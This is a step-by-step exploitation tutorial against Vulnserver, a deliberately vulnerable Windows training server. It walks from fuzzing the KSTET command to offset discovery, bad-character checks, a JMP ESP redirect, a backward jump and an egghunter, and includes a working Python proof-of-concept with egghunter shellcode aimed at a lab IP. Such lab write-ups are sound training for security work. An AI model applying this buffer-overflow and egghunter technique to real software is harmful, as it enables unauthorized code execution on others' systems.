Vulnserver is a Windows based threaded TCP server application that is designed to be exploited. The program is intended to be used as a learning tool to teach about the process of software exploitation, as well as a good victim program for testing new exploitation techniques and shellcode.
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
Vulnserver - Link above
python 2.7 x86, pydbg 32-bit binary, python wmi, pywin32
Immunity Debugger with mona installed
Kali 2.0 with Boofuzz fuzzer
2.1 Interface
Using netcat connect to X.X.X.X:9999 and issue the HELP command to confirm that everything is working as expected:
3. Fuzzing
For the purpose of this tutorial we will be focusing on fuzzing the KSTET command. Observing that the valid argument structure for the KSTET command is roughly <kstet>[space]<command_value> we can try sending KSTET hello as a test and see if it’s accepted.
As can bee seen above, the command and argument executed successfully. Now that we have confirmed the structure of a command and its arguments, we can start fuzzing this command to see if we can get the program to crash when submitting various argument values to the KSTET command.
The following BOOFUZZ template was created to fuzz the KSTET command in an effort to get the program to crash.
The following command appears to have crashed the program indicating that the "KSTET" command can be manipulated to force the program to crash.
3.2 Analysing The Crash
Based on the TCP stream (Figure 5), the number of bytes that was sent by the fuzzer and that caused the crash was around 5000 bytes.
To gain a better understanding of this, the following template was used to identify the length needed to overflow the KSTET command and cause the crash:
As can be seen from Figure 7 the program crashes when a string of 5990 chars is sent. Checking the dump using immunity it can be seen that we control a buffer of length 90 bytes - Figure 8.
4. Determine Offset
Using msf-pattern_create create a pattern of length 90 bytes.
Restart the application and run the updated exploit below:
As can be seen from Figure 12, we can successfully control EIP. It can also be observed that the buffer of D’s is located directly after the 4 bytes of B’s. This means that we will be able to simply place our shellcode right after the 4 bytes of B’s.
Outlined below are the changes you will need to make:
# Modify lines 35 - 40 to be the same as below''' INSERT THE REQUEST TEMPLATE HERE - NEEDS TO BE MODIFIED EVERY TIME'''request_template = ("KSTET /.:/{}")
# Modify Lines 46 and 56 to be the same as belowiteration =0processName ="vulnserver.exe"# name of the process as it appears in tasklistexecutable =r"C:\Documents and Settings\Administrator\My Documents\Downloads\vulnserver\vulnserver.exe"# path the executable to start the processstart_buffer_address ="\x0C\xFA\xB7\x00"# Take this value straight from immunitystart_buffer_address_offset =0x04# The offset you want to read. Note this will typically be 4seh_violation =False# Change me depending on crash occuring in seh handler listeningPort =9999# Address of the listening processcrashLoad ="A"*2003+"B"*4+"{}"+"C"*3970# load to crash the proces with {} representing where our test chars will goresponsive_test_string ="HELP"crash_wait_timeout =10# seconds to wait after a payload has been sentservice_responsive_timeout =10
5.2 Results
Execute the script. Once finished you should have identical results to those outlined below in Figure 14.
As can be seen from Figure 15, '\x00' is the only bad character.
6. Redirecting Execution Flow
As can be seen from Figure 14 all the expected characters (\x01 to \xFF) are accepted. This means that the only bad character was the NULL byte (\x00 - Figure 15). The next step was to find an address that contains a JMP ESP instruction. ]
NOTE: It’s always recommended to use an address from the application itself, or a DLL that comes with the application for compatibility purposes. I.E. the exploit will work even if the application was installed on a different machine. For Vulnserver.exe we can look at the DLL that comes with it (essfunc.dll).
Restart the application in Immunity and execute the following command !mona jmp -r esp -m "essfunc.dll".
6.1 Taking Control of EIP
Restart the application in Immunity, set a breakpoint at address 0x625011AF and execute the updated POC below
Step through the breakpoint using F7 and you will land in the D buffer - Figure 18.
7. Jumping Out Of Small Buffer
As can be seen in Figure 19, we have approximately 20 bytes remaining. Due to the limited buffer space remaining we will need to somehow jump backwards into our A buffer to gain more space. To do this we will perform a negative jump of 70 bytes backwards into our A buffer.
Restart the application, set a breakpoint at 0x625011AFand run the updated exploit shown below:
If we follow the jump using F7 we should land in the start of our A buffer.
We now have 66 bytes that we can use. This space is still quiet small and nowhere near long enough for shellcode. To circumvent this, we can perform a 2 stage attack. The first phase will be to use one of the other commands to inject our shellcode into memory and then the second phase will be to use an egghunter to locate our shellcode in memory and execute it.
8. Egghunter
At this point there is approximately 66 bytes of uninterrupted space under our control in our A buffer. This is more than enough space for an egghunter - typically 32 bytes. The following command was used to generate our egghunter. msf-egghunter -f raw -e b00b -v egghunter -p windows -a x86 -f python
8.1 Verify That Egghunter Works
The next step is to add the shellcode for the egghunter. Restart the application, set a breakpoint at 0x625011AFand run the updated exploit shown below:
import socketimport struct# Function to send shellcode using one of the other commands to have it stored in memory. definject_memory(TCP_IP,TCP_PORT): commands = ['STATS','RTIME','LTIME','SRUN','TRUN','GMON','GDOG','HTER','LTER','KSTAN'] # GTER caused issuesfor command in commands: payload ="{} b00bb00b{}".format(command, "B"* (500)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) s.send(payload) s.close()# Main function to redirect execution flow and execute egghunterdefmain_payload(TCP_IP,TCP_PORT): egghunter =b"" egghunter +=b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd" egghunter +=b"\x2e\x3c\x05\x5a\x74\xef\xb8\x62\x30\x30\x62" egghunter +=b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" payload ="KSTET /.:/" payload +="A"*2# Junk payload += egghunter payload +="A"* (76-len(payload)) payload += struct.pack("<I",0x625011AF)# Overwrite EIP payload +="\xeb\xb8"# Negative jump backwards 60 bytes payload +="D"* (5990-len(payload)) # Junk s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) s.send(payload) s.close()TCP_IP ='192.168.109.129'TCP_PORT =9999inject_memory(TCP_IP, TCP_PORT)main_payload(TCP_IP, TCP_PORT)
Stepping into our breakpoint and taking the jump back to the start of our A buffer we should see the instructions for our egghunter. Set a breakpoint at 00D7F9E6 and hit F9.
Once our breakpoint is hit, follow it using f8 to the start of our located dummy code.
As can be seen from Figure 29 we have successfully verified that our egghunter is working as expected.
8.2 Finding A Suitable Command
As can be seen in Figure 29, the RTIME command is truncated after approximately 100 bytes. Again this is too small for our shellcode which will take up roughly 300+ bytes. Our next step is to locate which command has a large enough buffer that we can use to inject our shellcode.
9. Generating Shellcode
Using all the information that we've gathered we can now generate the payload as shown below: